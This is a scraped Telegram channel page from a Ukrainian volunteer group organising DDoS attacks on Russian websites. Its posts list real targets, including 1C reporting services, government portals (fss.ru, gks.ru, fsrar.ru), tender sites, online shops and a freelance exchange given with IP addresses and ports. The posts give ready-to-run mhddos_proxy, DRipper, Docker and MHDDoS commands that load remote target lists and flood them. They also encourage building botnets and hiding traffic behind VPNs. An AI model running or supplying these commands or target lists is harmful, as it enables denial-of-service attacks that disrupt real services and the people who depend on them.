cookie

نحن نستخدم ملفات تعريف الارتباط لتحسين تجربة التصفح الخاصة بك. بالنقر على "قبول الكل"، أنت توافق على استخدام ملفات تعريف الارتباط.

avatar

За рідну Україну!

Прошу усіх, розповсюджуйте цю групу своїм знайомим, чим більше нас, тим більше шансів вбити наглухо усі російські сайти! Кидайте посилання у студентські групи університетів, шкіл! Слава Україні!

إظهار المزيد
لم يتم تحديد البلدلم يتم تحديد اللغةالفئة غير محددة
Advertising posts
179المشتركون
لا توجد بيانات24 hour
لا توجد بيانات7 يوم
لا توجد بيانات30 يوم

جاري تحميل البيانات...

معدل نمو المشترك

جاري تحميل البيانات...

🔥Атакуємо багато різних сайтів РФ на тему 9-го травня🔥 сам конфіг з усіма цілями для ознайомлення можете глянути тут: https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l7_url ❗️Ці цілі також додані у наші автоматизовані скрипти, які самостійно оновлюються, тобто для них вам міняти нічого не потрібно ❗️Інструкції як встановити mhddos_proxy на Windows / Mac / Linux / Android тут: https://t.me/ddos_separ/990 ❗️Рекомендую усім перейти на новий супер-швидкий та стабільний VPN, щоб ваш провайдер не різав трафік через підключення до багатьох ІР(проксі) ❗️Усе інше(mhddos_proxy + VPN + авто-програми + Linux-сервери + розвідка цілей) тепер зібрано тут ❗️Щоб додати ваш поточний ІР (або ІР підключеного VPN) до атаки разом з проксі у кінець команди приписуйте --vpn, більше детально про це тут: https://t.me/ddos_separ/1172 ❗️DDoS рашистів через телеграм: https://t.me/ddos_separ/1177 ✅ПРІОРИТЕТ mhddos_proxy (якщо не спрацює python3 тоді - python / для Linux додайте sudo на початку): 🔹ПРІОРИТЕТ атака по L7: python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l7_url -t 3000 --rpc 3000 --http-methods GET POST --debug 🔹Атака по L4 tcp: python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l4_tcp -t 3000 --rpc 3000 --debug ✅Docker (mhddos_proxy) Windows / Для Linux додайте sudo: 🔹ПРІОРИТЕТ Атака по L7: docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l7_url -t 3000 --rpc 3000 --http-methods GET STRESS --debug 🔹Атака по L4 tcp: docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l4_tcp -t 3000 --rpc 3000 --debug 🟢DRipper (вийшла нова версія): 🔸Атака по L7: python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l7_url 🔸Атака по L4 tcp: python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l4_tcp 🟢Docker (DRipper) Windows / Для Linux додайте sudo: 🔸Атака по L7: docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l7_url 🔸Атака по L4 tcp: docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l4_tcp 💙Погнали - дамо їм жару💛
إظهار الكل...
🔥Як тему вихідного дня у цей раз візьмемо інтернет-магазини (про ЕГАИС теж не забули - вони є у конфігу)🔥 сам конфіг з усіма цілями для ознайомлення можете глянути тут: https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l7_url ❗️Ці цілі також додані у наші автоматизовані скрипти, які самостійно оновлюються, тобто для них вам міняти нічого не потрібно ❗️Інструкції як встановити mhddos_proxy на Windows / Mac / Linux / Android тут: https://t.me/ddos_separ/990 ❗️Рекомендую усім перейти на новий супер-швидкий та стабільний VPN, щоб ваш провайдер не різав трафік через підключення до багатьох ІР(проксі) ❗️Усе інше(mhddos_proxy + VPN + авто-програми + Linux-сервери + розвідка цілей) тепер зібрано тут ❗️Щоб додати ваш поточний ІР (або ІР підключеного VPN) до атаки разом з проксі у кінець команди приписуйте --vpn, більше детально про це тут: https://t.me/ddos_separ/1172 ❗️DDoS рашистів через телеграм: https://t.me/ddos_separ/1177 ✅ПРІОРИТЕТ mhddos_proxy (якщо не спрацює python3 тоді - python / для Linux додайте sudo на початку): 🔹ПРІОРИТЕТ атака по L7: python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l7_url -t 3000 --rpc 3000 --http-methods GET STRESS --debug 🔹Атака по L4 tcp: python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l4_tcp -t 3000 --rpc 3000 --debug ✅Docker (mhddos_proxy) Windows / Для Linux додайте sudo: 🔹ПРІОРИТЕТ Атака по L7: docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l7_url -t 3000 --rpc 3000 --http-methods GET STRESS --debug 🔹Атака по L4 tcp: docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l4_tcp -t 3000 --rpc 3000 --debug 🟢DRipper (вийшла нова версія): 🔸Атака по L7: python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l7_url 🔸Атака по L4 tcp: python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l4_tcp 🟢Docker (DRipper) Windows / Для Linux додайте sudo: 🔸Атака по L7: docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l7_url 🔸Атака по L4 tcp: docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l4_tcp 💙Погнали - дамо їм жару💛
إظهار الكل...
🔥Сьогодні атакуємо тендери РФ 🔥 ❗️Ці цілі також додані у наші автоматизовані скрипти, які самостійно оновлюються, тобто для них вам міняти нічого не потрібно ❗️Інструкції як встановити mhddos_proxy на Windows / Mac / Linux / Android тут: https://t.me/ddos_separ/990 ❗️Рекомендую усім перейти на новий супер-швидкий та стабільний VPN, щоб ваш провайдер не різав трафік через підключення до багатьох ІР(проксі) ❗️Усе інше(mhddos_proxy + VPN + авто-програми + Linux-сервери + розвідка цілей) тепер зібрано тут ❗️Щоб додати ваш поточний ІР (або ІР підключеного VPN) до атаки разом з проксі у кінець команди приписуйте --vpn, більше детально про це тут: https://t.me/ddos_separ/1172 ❗️DDoS рашистів через телеграм: https://t.me/ddos_separ/1177 ✅ПРІОРИТЕТ mhddos_proxy (якщо не спрацює python3 тоді - python / для Linux додайте sudo на початку): 🔹ПРІОРИТЕТ атака по L7:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/tender/tender_l7_url -t 4000 --rpc 4000 --http-methods GET STRESS --debug
🔹Атака по L4 tcp:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/tender/tender_l4_tcp -t 4000 --rpc 4000 --debug

✅Docker (mhddos_proxy) Windows / Для Linux додайте sudo: 🔹ПРІОРИТЕТ Атака по L7:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/tender/tender_l7_url -t 4000 --rpc 4000 --http-methods GET STRESS --debug
🔹Атака по L4 tcp:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/tender/tender_l4_tcp -t 4000 --rpc 4000 --debug

🟢DRipper (вийшла нова версія): 🔸Атака по L7:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/tender/tender_l7_url
🔸Атака по L4 tcp:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/tender/tender_l4_tcp

🟢Docker (DRipper) Windows / Для Linux додайте sudo: 🔸Атака по L7:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/tender/tender_l7_url
🔸Атака по L4 tcp:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/tender/tender_l4_tcp

💙Погнали - дамо їм жару💛
إظهار الكل...
Автоматичний DDoS new

АВТОМАТИЧНИЙ DDOS НА WINDOWS / MAC / ANROID / LINUX (ОСНОВА + СЕРВЕР(навіть при вимкненому комп’ютері)) Стаття створенна, щоб зібрати основні автоматичні методи ДДоСу, та, щоб кожен користувач міг зробити великий БотНет на 50 машин

🔥Сьогодні переключаємося на атаку тендерів та торгів (ЕГАИС також додано у конфіги)🔥
إظهار الكل...
🔥Атакуємо звітність 1C в РФ🔥 ❗️Ці цілі також додані у наші автоматизовані скрипти, які самостійно оновлюються, тобто для них вам міняти нічого не потрібно ❗️Інструкції як встановити mhddos_proxy на Windows / Mac / Linux / Android тут: https://t.me/ddos_separ/990 ❗️Рекомендую усім перейти на новий супер-швидкий та стабільний VPN, щоб ваш провайдер не різав трафік через підключення до багатьох ІР(проксі) ❗️Усе інше(mhddos_proxy + VPN + авто-програми + Linux-сервери + розвідка цілей) тепер зібрано тут ❗️Щоб додати ваш поточний ІР (або ІР підключеного VPN) до атаки разом з проксі у кінець команди приписуйте --vpn, більше детально про це тут: https://t.me/ddos_separ/1172 ✅ПРІОРИТЕТ mhddos_proxy (якщо не спрацює python3 тоді - python / для Linux додайте sudo на початку): 🔹ПРІОРИТЕТ атака по L7 URL:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url -t 2500 --rpc 2000 --http-methods GET STRESS --debug
🔹Атака по L7 http(s)://IP:PORT:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http -t 2500 --rpc 2000 --http-methods GET STRESS --debug
🔹Атака по L4 tcp:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp -t 2500 --rpc 2000 --debug

✅Docker (mhddos_proxy) Windows / Для Linux додайте sudo: 🔹ПРІОРИТЕТ Атака по L7 URL:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url -t 2500 --rpc 2000 --http-methods GET STRESS --debug
🔹Атака по L7 http(s)://IP:PORT:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http -t 2500 --rpc 2000 --http-methods GET STRESS --debug
🔹Атака по L4 tcp:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp -t 2500 --rpc 2000 --debug

🟢DRipper (вийшла нова версія): 🔸Атака по L7 URL:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url
🔸Атака по L7 http(s)://IP:PORT:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http
🔸Атака по L4 tcp:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp

🟢Docker (DRipper) Windows / Для Linux додайте sudo: 🔸Атака по L7 URL:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url
🔸Атака по L7 http(s)://IP:PORT:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http
🔸Атака по L4 tcp:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp

💙Погнали - дамо їм жару💛
إظهار الكل...
🔥До конфігу цілей по звітності додано ще й ЕГАИС, тому продовжуємо атаку і сьогодні🔥
إظهار الكل...
🔥Атакуємо звітність 1C в РФ🔥 https://1c.ru/ https://downloads.v8.1c.ru https://login.1c.ru/login https://reputils.1c.ru https://invitations.1c-edo.keydisk.ru/ http://online.1c.ru/catalog/products/ https://1csoft.ru/wherebuy https://www.cryptopro.ru/downloads https://regservice.keydisk.ru http://regservice.keydisk.ru:8092 https://service.fsrar.ru http://frap.fsrar.ru http://gibdd.fsrar.ru/ https://service.alcolicenziat.ru/auth/login http://f4.fss.ru http://docs.fss.ru https://lk.fss.ru https://websbor.gks.ru/online https://online.gks.ru/online https://updateids2.infotecs.ru https://kontur.ru https://auth.kontur.ru/ https://ofd.kontur.ru ❗️Ці цілі також додані у наші автоматизовані скрипти ❗️Інструкції як встановити mhddos_proxy на Windows / Mac / Linux / Android тут: https://t.me/ddos_separ/990 ❗️Рекомендую усім перейти на новий супер-швидкий та стабільний VPN ❗️Усе інше(mhddos_proxy + VPN + авто-програми + Linux-сервери + Розвідка цілей) тепер зібрано тут ❗️Вийшла нова покращена версія mhddos_proxy, рекомендую оновити (обирайте інструкцію для вашої ОС та гортайте до пункту Запуск команд / атаки): https://t.me/ddos_separ/990 (для Linux-серверів та авто-скриптів нічого не потрібно змінювати - воно оновлюється повністю самостійно) ❗️Ви можете допомогти нам у зборі проксі (це безкоштовно і не відніме у вас більше 30 хвилин часу на день): https://t.me/ddos_separ/1164 ✅ПРІОРИТЕТ mhddos_proxy (якщо не спрацює python3 тоді - python / для Linux додайте sudo на початку): 🔹ПРІОРИТЕТ атака по L7 URL:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url -t 2500 --rpc 2000 --http-methods GET STRESS --debug
🔹Атака по L7 http(s)://IP:PORT:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http -t 2500 --rpc 2000 --http-methods GET STRESS --debug
🔹Атака по L4 tcp:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp -t 2500 --rpc 2000 --debug

✅Docker (mhddos_proxy) Windows / Для Linux додайте sudo: 🔹ПРІОРИТЕТ Атака по L7 URL:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url -t 2500 --rpc 2000 --http-methods GET STRESS --debug
🔹Атака по L7 http(s)://IP:PORT:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http -t 2500 --rpc 2000 --http-methods GET STRESS --debug
🔹Атака по L4 tcp:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp -t 2500 --rpc 2000 --debug

🟢DRipper (вийшла нова версія): 🔸Атака по L7 URL:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url
🔸Атака по L7 http(s)://IP:PORT:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http
🔸Атака по L4 tcp:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp

🟢Docker (DRipper) Windows / Для Linux додайте sudo: 🔸Атака по L7 URL:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url
🔸Атака по L7 http(s)://IP:PORT:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http
🔸Атака по L4 tcp:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp

💙Погнали - дамо їм жару💛
إظهار الكل...
🔥Атакуємо звітність 1C в РФ🔥 https://1c.ru/ https://downloads.v8.1c.ru https://login.1c.ru/login https://reputils.1c.ru https://invitations.1c-edo.keydisk.ru/ http://online.1c.ru/catalog/products/ https://1csoft.ru/wherebuy https://www.cryptopro.ru/downloads https://regservice.keydisk.ru http://regservice.keydisk.ru:8092 https://service.fsrar.ru http://frap.fsrar.ru http://gibdd.fsrar.ru/ https://service.alcolicenziat.ru/auth/login http://f4.fss.ru http://docs.fss.ru https://lk.fss.ru https://websbor.gks.ru/online https://online.gks.ru/online https://updateids2.infotecs.ru https://kontur.ru https://auth.kontur.ru/ https://ofd.kontur.ru ❗️Ці цілі також додані у наші автоматизовані скрипти ❗️Інструкції як встановити mhddos_proxy на Windows / Mac / Linux / Android тут: https://t.me/ddos_separ/990 ❗️Рекомендую усім перейти на новий супер-швидкий та стабільний VPN ❗️Усе інше(mhddos_proxy + VPN + авто-програми + Linux-сервери + Розвідка цілей) тепер зібрано тут ❗️Вийшла нова покращена версія mhddos_proxy, рекомендую оновити (обирайте інструкцію для вашої ОС та гортайте до пункту Запуск команд / атаки): https://t.me/ddos_separ/990 (для Linux-серверів та авто-скриптів нічого не потрібно змінювати - воно оновлюється повністю самостійно) ❗️Ви можете допомогти нам у зборі проксі (це безкоштовно і не відніме у вас більше 30 хвилин часу на день): https://t.me/ddos_separ/1164 ✅ПРІОРИТЕТ mhddos_proxy (якщо не спрацює python3 тоді - python / для Linux додайте sudo на початку): 🔹ПРІОРИТЕТ атака по L7 URL:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url -t 2500 --rpc 2000 --http-methods GET STRESS --debug
🔹Атака по L7 http(s)://IP:PORT:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http -t 2500 --rpc 2000 --http-methods GET STRESS --debug
🔹Атака по L4 tcp:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp -t 2500 --rpc 2000 --debug

✅Docker (mhddos_proxy) Windows / Для Linux додайте sudo: 🔹ПРІОРИТЕТ Атака по L7 URL:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url -t 2500 --rpc 2000 --http-methods GET STRESS --debug
🔹Атака по L7 http(s)://IP:PORT:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http -t 2500 --rpc 2000 --http-methods GET STRESS --debug
🔹Атака по L4 tcp:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp -t 2500 --rpc 2000 --debug

🟢DRipper (вийшла нова версія): 🔸Атака по L7 URL:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url
🔸Атака по L7 http(s)://IP:PORT:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http
🔸Атака по L4 tcp:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp

🟢Docker (DRipper) Windows / Для Linux додайте sudo: 🔸Атака по L7 URL:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url
🔸Атака по L7 http(s)://IP:PORT:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http
🔸Атака по L4 tcp:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp

💙Погнали - дамо їм жару💛
إظهار الكل...
🔥Знайшли таку інформацію по звітності, тому атакуємо сьогодні їх звітність знову🔥
إظهار الكل...
Знову всіх вітаю, сподіваюсь, ви готові?😏 Атакуємо російську фріланс біржу Фретен — не найпопулярніший сервіс, але через нього теж багато людей працюють, і потік грошей там великий. Такі сервіси, зазвичай, платять налоги в держ. казну РФ, а значить фінансово підтримують ворога. Думаю більше розповідати тут нічого. ЧАВИМО РАШИСТІВ🤬 freten.ru robroy.ru 37.46.131.229 [21/TCP, 22/TCP, 443/TCP, 1500/TCP] —> сайт* [53/UDP, 123/UDP] mail.freten.ru mail.robroy.ru 37.46.131.229 [25/smtp, 110/pop3, 143/imap, 465/ssl/smtp, 587/smtp, 993/ssl/imap, 995/ssl/pop3] —> пошта* 82.146.43.2 94.250.248.160 [53/UDP] —> DNS-servers* Команда для Docker: docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://freten.ru https://mail.freten.ru https://robroy.ru https://mail.robroy.ru -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table Команда для mhddos_proxy: python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table python runner.py https://freten.ru https://mail.freten.ru https://robroy.ru https://mail.robroy.ru -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table Команди для MHDDoS:
python3 start.py UDP 37.46.131.229:53 5000 10000 true
python3 start.py UDP 94.250.248.160:53 5000 10000 true
python3 start.py UDP 82.146.43.2:53 5000 10000 true

python3 start.py UDP 37.46.131.229:123 5000 10000 true
(тут синхронізація часу(123 порт), тому не пріорітетна команда)* python3 start.py STRESS https://freten.ru 6 1000 proxy.txt 10000 5000 true python3 start.py STRESS https://robroy.ru 6 1000 proxy.txt 10000 5000 true python3 start.py POST https://mail.freten.ru 6 1000 proxy.txt 10000 5000 true python3 start.py POST https://mail.robroy.ru 6 1000 proxy.txt 10000 5000 true
إظهار الكل...